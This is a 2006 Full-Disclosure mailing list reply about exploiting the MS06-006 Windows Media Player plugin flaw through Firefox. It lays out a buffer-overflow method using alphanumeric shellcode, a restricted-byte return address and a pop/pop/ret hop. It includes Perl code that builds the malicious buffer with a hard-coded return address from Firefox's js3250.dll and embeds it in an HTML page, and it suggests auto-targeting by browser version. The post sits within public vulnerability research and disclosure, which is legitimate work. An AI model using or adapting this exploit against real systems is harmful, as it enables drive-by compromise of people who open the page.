Date: Thu Feb 16 23:23:34 2006
From: fdlist at digitaloffense.net (H D Moore)
Subject: MS06-06 Windows Media Player Exploitation

Still getting some annoying crashes (SEH trick in alphanum code is 
annoying when you are trying to debug something...), but the basic 
solution is:

1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

my $pattern   = Pex::Text::PatternCreate(16384);
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content   = "<html><body><embed src=\"$pattern.wmv\"></body></html>";

Return address is from js3250.dll in Firefox 1.5.0.1, you should 
auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32
> shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
>
> regards
> c0ntex
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
